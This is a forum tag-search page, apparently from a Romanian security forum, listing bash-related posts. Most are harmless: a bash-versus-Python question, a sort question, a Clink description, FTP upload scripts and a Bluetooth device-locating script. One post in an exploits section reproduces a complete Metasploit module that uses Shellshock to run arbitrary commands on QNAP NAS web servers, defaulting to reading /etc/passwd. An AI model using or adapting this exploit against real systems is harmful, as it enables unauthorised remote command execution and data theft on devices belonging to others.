Search the Community
Showing results for tags 'bash'.
Found 6 results
-
Salut. Trăgând cu ochiul peste niște proiecte pe github, am văzut fișiere .sh, mă uitam să văd ce anume fac, majoritatea erau pentru automatizare, care făceau request-uri sau alte lucruri de genul, comenzi bash, desigur. Mă gândeam dacă am nevoie de bash scripts, devreme ce știu puțin python, de ce nu aș putea obține aceleași rezultate cu acesta (py), în loc de bash? M-am uitat să văd ce zice google, primele rezultate de la stackoverflow, majoritatea sugerau că depinde de preferințe și alții explicau diferența dintre modul în care sunt executate, poate câteva detalii despre performanță și lucruri low-level care m-au făcut confuz. Voi ce părere aveți? Când folosiți bash în loc de python/ruby și vice versa? Desigur, python/ruby sunt pentru domenii mai largi, eu vreau să îndrept subiectul spre domeniul în care este folosit bash-ul mai mult, I guess sysops stuff. P.S.: Nu sunt atât de informat cu privire la lucruri de genul, mă scuzați dacă întrebările sunt cam nepotrivite.
-
QNAP Web Server Remote Code Execution via Bash Environment Variable Code Injection
Aerosol posted a topic in Exploituri
# Exploit Title: QNAP Web server remote code execution via Bash Environment Variable Code Injection # Date: 7 February 2015 # Exploit Author: Patrick Pellegrino | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] # Employer homepage: http://www.securegroup.it # Vendor homepage: http://www.qnap.com # Version: All Turbo NAS models except TS-100, TS-101, TS-200 # Tested on: TS-1279U-RP # CVE : 2014-6271 # Vendor URL bulletin : http://www.qnap.com/i/it/support/con_show.php?cid=61 ## # This module requires Metasploit: http//metasploit.com/download # Current source: https://github.com/d3vpp/metasploit-modules ## require 'msf/core' class Metasploit3 < Msf::Auxiliary Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'QNAP Web server remote code execution via Bash Environment Variable Code Injection', 'Description' => %q{ This module allows you to inject unix command with the same user who runs the http service - admin - directly on the QNAP system. Affected products: All Turbo NAS models except TS-100, TS-101, TS-200 }, 'Author' => ['Patrick Pellegrino'], # Metasploit module | 0x700x700x650x6c0x6c0x650x670x720x690x6e0x6f@securegroup.it [work] / 0x640x330x760x620x700x70@gmail.com [other] 'License' => MSF_LICENSE, 'References' => [ ['CVE', '2014-6271'], #aka ShellShock ['URL', 'http://www.qnap.com/i/it/support/con_show.php?cid=61'] ], 'Platform' => ['unix'] )) register_options([ OptString.new('TARGETURI', [true, 'Path to CGI script','/cgi-bin/index.cgi']), OptString.new('CMD', [ true, 'The command to run', '/bin/cat /etc/passwd']) ], self.class) end def check begin res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; /usr/bin/id" }) rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::Timeout::Error, ::Errno::EPIPE vprint_error("Connection failed") return Exploit::CheckCode::Unknown end if !res return Exploit::CheckCode::Unknown elsif res.code== 302 and res.body.include? 'uid' return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def run res = send_request_cgi({ 'method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'agent' => "() { :;}; echo; #{datastore['CMD']}" }) if res.body.empty? print_error("No data found.") elsif res.code== 302 print_status("#{rhost}:#{rport} - bash env variable injected") puts " " print_line(res.body) end end end Source -
BlueRanger is a simple Bash script which uses Link Quality to locate Bluetooth device radios. It sends l2cap (Bluetooth) pings to create a connection between Bluetooth interfaces, since most devices allow pings without any authentication or authorization. The higher the link quality, the closer the device (in theory). Use a Bluetooth Class 1 adapter for long range location detection. Switch to a Class 3 adapter for more precise short range locating. The precision and accuracy depend on the build quality of the Bluetooth adapter, interference, and response from the remote device. Fluctuations may occur even when neither device is in motion. Installation: This script can run from any directory. Resources: BlueZ hcitool l2ping Usage: Provide the local interface and Device Address of the device you are trying to locate. # blueranger.sh hci0 6C:D6:8A:B1:30:BC Download: http://www.hackfromacave.com/download/blueranger.sh
-
Salut, am niste fisiere csv pe care vreau sa le concatenez intr-unu singur fisier si sa le ordonez numeric. Problema e ca idul dupa care ordonez nu respecta o notatie standard. de ex . sort -f *.csv > output.csv merge daca idul respecta forma id001 id002 id010 id100. Idurile pt fisierele mele sunt id1 id2 id10 id100 si asta imi strica sortarea. sort -t, -V *.csv > output.csv merge perfect face exact ce imi trebuie pe masina de test care are sort --version gnu coreutils 8.5.0 nu 5.3.0 versiunea de la munca. Si bineinteles nu era implementata -V in 5.3.0 ma simt noob ... dar si ghinionist. Daca va plictisiti si aveti o idee mai buna, bring it on ! Multumesc
-
Bringing Bash's powerful command line editing to Microsoft Windows' cmd.exe Introduction Clink enhances your productivity in Microsoft Windows' "cmd.exe". If you're familiar with Bash then you will be familiar with the changes that clink brings to "cmd.exe" (it uses the same 'Readline' library that Bash uses). It is a small utility to enhance "cmd.exe", adding more powerful command line completion, editing, and history. Features Powerful Bash-like line editing from GNU's Readline library. Read more on Readline's keyboard shortcuts. Superior path completion (TAB). Paste from clipboard (Ctrl-V). Support for the completion of executables/commands, and environment variables. Undo/Redo (Ctrl-_ or Ctrl-X, Ctrl-U) Improved command line history. Persists across sessions. Searchable (Ctrl-R and Ctrl-S). History expansion (e.g. !!, !<string>, and !$). [*] Scriptable completion using Lua. Usage There are a variety of ways to start clink; If you installed the auto-run, start "cmd.exe" as per usual. To manually start, run the clink shortcut from the Start menu (or the clink.bat located in the install directory). To deploy clink to an existing cmd.exe process, use "<install_dir>\clink.exe inject" clink has been tested on Windows XP SP3 and upwards. Visual C++ Redistributable requirement clink requires that the Microsoft's Visual C++ 2010 Redistributable be install on your system. If you need to install them they can be found here; 32-bit (x86); Download Microsoft Visual C++ 2010 Redistributable Package (x86) from Official Microsoft Download Center 64-bit (x64); Download Microsoft Visual C++ 2010 Redistributable Package (x64) from Official Microsoft Download Center Writing completion scripts with Lua It is easy to customise completion in clink with simple Lua scripts. It is a matter of writing a match generator function and registering the function with clink. When called the generator function adds matches to clink - if appropriate. A very basic example script gives the best overview of what is involved; -- Globals; -- rl_line_buffer : The current command line. -- rl_point : Current location of the cursor. function example_match_generator(text, first, last) -- Arguments; -- text : The word being completed, as tokenised by Readline. -- first : The index into rl_line_buffer where 'text' starts. -- last : Index into rl_line_buffer where 'text' ends. -- Returns; -- true : No further generator functions should be called. -- false : Generator has done nothing. Try the next generator. -- In this simple example generate a match when the user types -- the following; my_ma<TAB> if not rl_line_buffer == "my_ma" then return false end clink.add_match("my_match") return true end -- clink.register_match_generator(<function>, <priority>) clink.register_match_generator(example_match_generator, 50) Further examples can be found in clink's install directory. User's Lua scripts go in %ALLUSERSPROFILE%\clink\ (which is usually C:\ProgramData\clink\) and clink loads the .lua files it finds there. The keyboard shortcut Ctrl-Q will force clink to reload the Lua scripts - useful when writing your own scripts. Changing match display colour Create a new Lua script in %ALLUSERSPROFILE%\clink\ Add the following line (where X is a number in the range 0-15); clink.setpalette(X) For values for X run "color /?" on a command prompt. Building clink Download Premake from here; Premake | Industrious One There is a bug in Premake 4.3 that generates corrupt .vcxproj files. Please use 4.4 (or newer). [*] Run "premake <toolchain>" in the root of clink's source tree. Where "<toolchain>" is one of Premake's actions (see "premake --help") clink has been tested with vs2010, gmake (with mingw32), and vs2008. [*] Build scripts will be generated in ".build\<toolchain>\". For example; .build\vs2010\clink.sln. Builds Builds from the git repository can be found here; https://www.dropbox.com/sh/r9oqmn2mqfp3okp/Jm_F3pJSNI Downloads Source: https://code.google.com/p/clink/
-
Connect to FTP HOST and Send File Script 1 #!/bin/sh -vx # # Script to FTP data to server # Paramters: host FTP Server # user FTP Username # passwd FTP Password # file File to send/put ############################## # Variables HOST=$1 USER=$2 PASSWD=$3 FILE=$4 TONAME=$5 # Connect to FTP HOST and Send File ftp -n $HOST <<END_SCRIPT quote USER $USER quote PASS $PASSWD dir ascii put $FILE $TONAME dir quit END_SCRIPT exit 0 Usage: ./ftp1.sh <host> <username> <passwd> <filename> <toname> Script 2 #!/bin/bash clear echo "[+] - - - - - - - - - - - - - - - - - - - - - - - [+]" echo "[+] irc.[***].com [+]" echo "[+] #PUB - Channel [+]" echo "[+] Usage: ./ftp.sh ftp.TV.nL users pass arhive [+]" echo "[+] - - - - - - - - - - - - - - - - - - - - - - - [+]" ftp -inv $1<<ENDFTP user $2 $3 put $4 bye ENDFTP echo "[+] Gata [+]" echo "[+] uter [+]" usage: ./ftp.sh <host> <user> <pass> <arhiva> Download: [+] Script 1 - http://tevad.do.am/ftp1.sh [+] Script 2 - http://tevad.do.am/ftp.sh
-
- 1
-
-
- bash
- bash ftp sendfile
- (and 2 more)
